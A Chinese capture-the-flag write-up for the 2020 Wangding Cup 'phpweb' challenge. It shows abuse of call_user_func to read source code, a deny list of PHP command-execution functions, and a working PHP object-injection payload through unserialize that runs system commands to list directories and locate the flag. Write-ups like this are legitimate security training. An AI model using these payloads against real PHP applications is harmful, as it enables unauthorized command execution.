[网鼎杯 2020 朱雀组]phpweb

打开题目

Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone ‘UTC’ for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24
2021-11-05 06:48:31 am

查看源代码，关键代码如下

<script language=javascript>
    setTimeout("document.form1.submit()",5000)
</script>

<input type=hidden id=func name=func value='date'>
<input type=hidden id=p name=p value='Y-m-d h:i:s a'>

根据页面显示，这两个提交的数据应该是可以利用的。
先禁用js，再手动提交参数测试。

index.php?func=a

回显

Warning: call_user_func() expects parameter 1 to be a valid callback, function ‘a’ not found or invalid function name in /var/www/html/index.php on line 24

那么call_user_func的参数应该分别是我们提交的func和p
理论上讲已经可以直接拿到flag了

index.php?func=file_get_contents&p=index.php

得到源码

    <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

正常传递函数和参数恐怕是难以绕过，但源码里有一个类，那么方法已经很显然了，传递一个反序列化函数和一个序列化字符串，利用魔术方法获取flag

index.php?func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var var

出人意料的是，flag不在根目录下,查找flag文件也找不到，可能改了名字

index.php?func=unserialize&p=O:4:"Test":2:{s:1:"p";s:21:"find / -name '*flag*'";s:4:"func";s:6:"system";}

得到大量数据，当然不能一个一个去看，找找看起来不正常的

最终找到一个

/tmp/flagoefiu4r93

拿到flag